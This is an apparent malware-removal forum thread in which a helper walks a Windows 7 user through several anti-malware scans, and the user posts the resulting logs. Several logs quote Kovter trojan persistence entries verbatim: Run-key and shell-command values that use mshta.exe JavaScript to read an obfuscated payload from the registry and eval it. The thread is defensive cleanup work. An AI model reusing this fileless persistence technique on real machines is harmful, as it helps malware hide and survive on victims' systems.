PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\_metadata\verified_contents.json, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.MySearch, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\KDJGGBDJKCMBONMCLBNNPMFGIPHFKMDJ\28.11_0\MANIFEST.JSON, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\common\browseraction.js, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\common\config.js, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\common\feed.js, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\common\utils.js, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\common\winner.js, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\logo_128x.png, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\logo_16x.png, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\logo_19x.png, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\logo_24x.png, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\logo_32x.png, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\logo_48x.png, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\newtablogo.png, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\toolbar-icon-ask.ico, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo\toolbar-icons.png, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\revert\index.css, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\revert\index.html, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\revert\index.js, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\settings\common\redirect.js, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\settings\partner\Reporting.js, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\_metadata\computed_hashes.json, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\_metadata\verified_contents.json, Quarantined, [120], [443207],1.0.11632
PUP.Optional.Searchweb, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [238], [554501],1.0.11632
PUP.Optional.Searchweb, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [238], [554501],1.0.11632
 
Physical Sector: 0
(No malicious items detected)
 
WMI: 0
(No malicious items detected)
 
 
(end)
 
# ——————————-
# Malwarebytes AdwCleaner 7.3.0.0
# ——————————-
# Build:    04-04-2019
# Database: 2019-07-15.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# ——————————-
# Mode: Clean
# ——————————-
# Start:    07-19-2019
# Duration: 00:00:03
# OS:       Windows 7 Home Premium
# Cleaned:  20
# Failed:   0
 
 
***** [ Services ] *****
 
No malicious services cleaned.
 
***** [ Folders ] *****
 
No malicious folders cleaned.
 
***** [ Files ] *****
 
No malicious files cleaned.
 
***** [ DLL ] *****
 
No malicious DLLs cleaned.
 
***** [ WMI ] *****
 
No malicious WMI cleaned.
 
***** [ Shortcuts ] *****
 
No malicious shortcuts cleaned.
 
***** [ Tasks ] *****
 
No malicious tasks cleaned.
 
***** [ Registry ] *****
 
Deleted       HKCU\Software\Classes\.torrent|iLivid.torrent_backup
Deleted       HKCU\Software\RegisteredApplications|AceStream
Deleted       HKLM\SOFTWARE\Classes\.URL\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.bmp\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.dib\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.gif\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.htm\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.html\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.ico\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.jfif\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.jpe\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.jpg\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.mfp\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.pdf\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.png\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.shtml\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.webm\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.xht\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\.xhtml\OpenWithList\Torch.exe
Deleted       HKLM\SOFTWARE\Classes\Applications\TorchSetup-r0-n-bc.exe
 
***** [ Chromium (and derivatives) ] *****
 
No malicious Chromium entries cleaned.
 
***** [ Chromium URLs ] *****
 
No malicious Chromium URLs cleaned.
 
***** [ Firefox (and derivatives) ] *****
 
No malicious Firefox entries cleaned.
 
***** [ Firefox URLs ] *****
 
No malicious Firefox URLs cleaned.
 
 
*************************
 
[+] Delete Tracing Keys
[+] Reset Winsock
 
*************************
 
AdwCleaner[S00].txt - [2895 octets] - [19/07/2019 12:01:16]
 
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
 

Thanks for the logs.

Run RogueKiller

IMPORTANT: Please remove any usb or external drives from the computer and close all running programs before you run this scan!

Download RogueKiller to your desktop

  • for Windows Vista/7/8/10, right click -> run as administrator, for XP simply double-click on RogueKiller.exe
  • click on Scan then Start under ‘Standard Scan (recommended)’
  • when it has finished, click on Results
  • click on Report
  • click Open and then select text file
  • save the file to your Desktop as RKreport.txt
  • copy/paste the content in your next post
  • NOTE: DO NOT attempt to remove anything that the scan detects –everything that is reported is not necessarily bad

Satchfan

 

RogueKiller Anti-Malware V13.3.2.0 (x64) [Jul 15 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : richard [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190718_182943, Driver : Loaded
Mode : Standard Scan, Scan – Date : 2019/07/19 19:14:21 (Duration : 00:23:20)

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> O4 - Run
  [Tr.Kovter (Malicious)] (X64) HKEY_USERS\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Windows\CurrentVersion

\Run||ayjqynct – "C:\Windows\system32\mshta.exe" javascript:uTw1jYvh="6qNcFP";Yb67=new%20ActiveXObject

("WScript.Shell");i6QpJFt="5KP1uU";xE2hY0=Yb67.RegRead("HKCU\\software\\lwtp\\lvheg");q42IEnR="s";eval(xE2hY0);Wjuje12="RB";

(missing) -> Found
  [Tr.Kovter (Malicious)] (X64) HKEY_USERS\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Windows\CurrentVersion

\Run||xfhb – "C:\Users\richard\AppData\Local\2b9a\f2dc.54bc6" -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Kovter (Malicious)] (file) c721.5fa43 – C:\Users\richard\AppData\Roaming\ed4b\c721.5fa43 -> Found
[Tr.Kovter (Malicious)] (file) f2dc.54bc6 – C:\Users\richard\AppData\Local\2b9a\f2dc.54bc6 -> Found
[Tr.Kovter (Malicious)] (file) 896c.bat – C:\Users\richard\AppData\Local\d3e1\896c.bat -> Found
[Tr.Kovter (Malicious)] (file) 51bf.5fa43 – C:\Users\richard\AppData\Local\d3e1\51bf.5fa43 -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> Firefox Config
  [PUM.SearchEngine (Potentially Malicious)] browser.search.selectedEngine (C:\Users\richard\AppData\Roaming\Mozilla\Firefox

\Profiles\rhtphmuc.default\prefs.js) – Ask Web Search -> Found
 

Run RogueKiller

IMPORTANT: Do not reboot your computer if at all possible otherwise the malware will reactivate and you will have to run RogueKiller again

  • close all programs
  • double-click RogueKiller.exe - Windows 7/8//10: right-click the program and select Run as Administrator'
  • click on Start Scan
  • when the scan is finished press Remove Selected and post the log it produces.

Please then run it again and send the new log

================================================

Run Malwarebytes AntiRootkit

Please download Malwarebytes Anti-Rootkit (MBAR) from here and save it to your desktop.

  • double-click Mbar and choose to extract it also to your desktop
  • Next, and then on the Update button to let it update its database. Once the database has been successfully updated, click on Next
  • click on the Scan button
  • jf malware is found, do NOT press the ‘Cleanup’ button when the scan completes, click EXIT.
  • please go to the MBAR folder and then copy/paste the contents of the MBAR-log-***.txt
  • if there is no malware found, please let me know as well.

Satchfan

 

found 4 malware.

 

Malwarebytes Anti-Rootkit BETA 1.10.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2019.07.20.06
  rootkit: v2019.07.20.06
 
Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.19399
richard :: RICHARD-PC [administrator]
 
7/20/2019 6:02:25 PM
mbar-log-2019-07-20 (18-02-25).txt
 
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 209142
Time elapsed: 25 minute(s), 32 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 1
HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\787E\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> No action taken. [21e5925b3c8bcc6a2b29c9d1d828bb45]
 
Registry Values Detected: 3
HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^ayjqynct (Trojan.Fileless.MTGen) -> Data:  -> No action taken. [41c5d21bc2051026830b5052b54ba858]
HKU\S-1-5-21-441904776-594677368-125994074-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^xfhb (Trojan.Fileless.MTGen) -> Data:  -> No action taken. [3fc78d60facd65d14945adf56e92827e]
HKU\S-1-5-21-441904776-594677368-125994074-1001_Classes\787e\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\Windows\system32\mshta.exe" "javascript:yO0a4t="TjQwj";Vd7=new ActiveXObject("WScript.Shell");ASK0Rso1="hBH";D5yIj8=Vd7.RegRead("HKCU\\software\\lwtp\\lvheg");Rq3o9Dr="UG";eval(D5yIj8);M1inox="Y6";" -> No action taken. [21e5925b3c8bcc6a2b29c9d1d828bb45]
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)

I think we’re getting there.

Malwarebytes Anti-Rootkit Beta

  • run Malwarebytes Anti-Rootkit Beta again
  • once the scan is finished, make sure that every item is checked, and click on the Cleanup button (a reboot might be required)
  • after that (and the reboot, if one was required), go back in the mbar folder and look for a text file called mbar-log-TODAY'S-DATE.txt
  • copy/paste the content of that log in your next reply.

================================================

Run Malwarebytes Anti-Malware

Please reboot in Safe Mode and run Malwarebytes Anti-Malware again.
run the program

  • click on the ‘Dashboard’ to make sure everything is up to date, (it is not necessary to upgrade to the premium version of MBAM)
  • click on the ‘Scan’ tab, (directly below the Dashboard tab)
  • select the Threat Scan option
  • slick the Scan Now button
  • Threat Scan will begin
  • when the scan has completed and if malware was found, click the Quarantine Selected button to allow MBAM to quarantine what was found
  • if prompted to restart the computer, close all other programs and click Yes to restart your computer
  • once you are back at your desktop, open MBAM once more
  • click on the ‘Reports’ tab
  • double-click on the most recent Scan Report
  • click on Export, then Copy to Clipboard

Please paste the contents of the clipboard into your next reply to me together with the mbar-log-TODAY'S-DATE.txt log.

Satchfan

 

I did not see the part about running the RogueKiller again    I just did the malware anti*rootkit.   So do I need to go back and do that whole step again?

No, just run RogueKiller again to remove what was found and then post the three logs:

 

Malwarebytes log

Anti-Rootkit log

RogueKiller log.

 

Satchfan

here are the logs

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 7/23/19
Scan Time: 8:27 AM
Log File: 966effb1-ad4d-11e9-bed5-000000000000.json
 
-Software Information-
Version: 3.8.3.2965
Components Version: 1.0.613
Update Package Version: 1.0.11684
License: Trial
 
-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: richard-PC\richard
 
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 257779
Threats Detected: 0
Threats Quarantined: 0
Time Elapsed: 5 min, 5 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
WMI: 0
(No malicious items detected)
 
 
(end
 
RogueKiller Anti-Malware V13.3.2.0 (x64) [Jul 15 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : richard [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190718_182943, Driver : Loaded
Mode : Standard Scan, Scan – Date : 2019/07/19 19:14:21 (Duration : 00:23:20)
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> O4 - Run
  [Tr.Kovter (Malicious)] (X64) HKEY_USERS\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Windows\CurrentVersion\Run||ayjqynct – "C:\Windows\system32\mshta.exe" javascript:uTw1jYvh="6qNcFP";Yb67=new%20ActiveXObject("WScript.Shell");i6QpJFt="5KP1uU";xE2hY0=Yb67.RegRead("HKCU\\software\\lwtp\\lvheg");q42IEnR="s";eval(xE2hY0);Wjuje12="RB"; (missing) -> Found
  [Tr.Kovter (Malicious)] (X64) HKEY_USERS\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Windows\CurrentVersion\Run||xfhb – "C:\Users\richard\AppData\Local\2b9a\f2dc.54bc6" -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Kovter (Malicious)] (file) c721.5fa43 – C:\Users\richard\AppData\Roaming\ed4b\c721.5fa43 -> Found
[Tr.Kovter (Malicious)] (file) f2dc.54bc6 – C:\Users\richard\AppData\Local\2b9a\f2dc.54bc6 -> Found
[Tr.Kovter (Malicious)] (file) 896c.bat – C:\Users\richard\AppData\Local\d3e1\896c.bat -> Found
[Tr.Kovter (Malicious)] (file) 51bf.5fa43 – C:\Users\richard\AppData\Local\d3e1\51bf.5fa43 -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> Firefox Config
  [PUM.SearchEngine (Potentially Malicious)] browser.search.selectedEngine (C:\Users\richard\AppData\Roaming\Mozilla\Firefox\Profiles\rhtphmuc.default\prefs.js) – Ask Web Search -> Found
 
Malwarebytes Anti-Rootkit BETA 1.10.3.1001
 
© Malwarebytes Corporation 2011-2012
 
OS version: 6.1.7601 Windows 7 Service Pack 1 x64
 
Account is Administrative
 
Internet Explorer version: 11.0.9600.19399
 
File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 3.410000 GHz
Memory total: 8527740928, free: 4859195392
 
Downloaded database version: v2019.07.22.08
Downloaded database version: v2019.07.22.08
Downloaded database version: v2018.01.20.01
=======================================
Initializing…
Driver version: 4.3.0.15
———— Kernel report ————
     07/22/2019 13:08:31
———— Loaded modules ———–
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kdcom.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\CLFS.SYS
\SystemRoot\system32\CI.dll
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\ACPI.sys
\SystemRoot\system32\drivers\WMILIB.SYS
\SystemRoot\system32\drivers\msisadrv.sys
\SystemRoot\system32\drivers\pci.sys
\SystemRoot\system32\drivers\vdrvroot.sys
\SystemRoot\system32\DRIVERS\iusb3hcs.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\system32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\system32\DRIVERS\iaStor.sys
\SystemRoot\system32\drivers\atapi.sys
\SystemRoot\system32\drivers\ataport.SYS
\SystemRoot\system32\drivers\msahci.sys
\SystemRoot\system32\drivers\PCIIDEX.SYS
\SystemRoot\system32\DRIVERS\asahci64.sys
\SystemRoot\system32\drivers\amdxata.sys
\SystemRoot\system32\drivers\fltmgr.sys
\SystemRoot\system32\drivers\fileinfo.sys
\SystemRoot\System32\drivers\WRkrn.sys
\SystemRoot\System32\drivers\msrpc.sys
\SystemRoot\System32\drivers\NETIO.SYS
\SystemRoot\System32\drivers\NDIS.SYS
\SystemRoot\System32\drivers\TDI.SYS
\SystemRoot\System32\Drivers\Ntfs.sys
\SystemRoot\System32\Drivers\ksecdd.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\system32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\spldr.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\system32\drivers\iaStorF.sys
\SystemRoot\System32\drivers\hwpolicy.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\system32\drivers\disk.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\drivers\VIDEOPRT.SYS
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\system32\drivers\rdpencdd.sys
\SystemRoot\system32\drivers\rdprefmp.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\DRIVERS\wfplwf.sys
\SystemRoot\system32\DRIVERS\pacer.sys
\SystemRoot\system32\DRIVERS\vwififlt.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\drivers\termdd.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\system32\drivers\mssmbios.sys
\SystemRoot\System32\drivers\discache.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\blbdrive.sys
\SystemRoot\system32\DRIVERS\tunnel.sys
\SystemRoot\system32\DRIVERS\atikmpag.sys
\SystemRoot\system32\DRIVERS\atikmdag.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\dxgmms1.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\iusb3xhc.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\DRIVERS\HECIx64.sys
\SystemRoot\system32\DRIVERS\e1c62x64.sys
\SystemRoot\system32\drivers\usbehci.sys
\SystemRoot\system32\drivers\USBPORT.SYS
\SystemRoot\system32\DRIVERS\asmtxhci.sys
\SystemRoot\system32\DRIVERS\netr28x.sys
\SystemRoot\system32\DRIVERS\vwifibus.sys
\SystemRoot\system32\DRIVERS\athrx.sys
\SystemRoot\system32\drivers\wmiacpi.sys
\SystemRoot\system32\drivers\intelppm.sys
\SystemRoot\system32\DRIVERS\CompositeBus.sys
\SystemRoot\system32\DRIVERS\AgileVpn.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\rassstp.sys
\SystemRoot\system32\drivers\kbdclass.sys
\SystemRoot\system32\drivers\mouclass.sys
\SystemRoot\system32\drivers\swenum.sys
\SystemRoot\system32\drivers\ks.sys
\SystemRoot\system32\DRIVERS\umbus.sys
\SystemRoot\system32\drivers\usbhub.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\drivers\AtihdW76.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\system32\DRIVERS\iusb3hub.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\system32\DRIVERS\asmthub3.sys
\SystemRoot\system32\drivers\hidusb.sys
\SystemRoot\system32\drivers\HIDCLASS.SYS
\SystemRoot\system32\drivers\HIDPARSE.SYS
\SystemRoot\system32\drivers\usbccgp.sys
\SystemRoot\system32\DRIVERS\udfs.sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\Drivers\dump_iaStor.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\system32\DRIVERS\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\System32\Drivers\MbamChameleon.sys
\SystemRoot\system32\DRIVERS\lltdio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\DRIVERS\rspndr.sys
\SystemRoot\system32\drivers\HTTP.sys
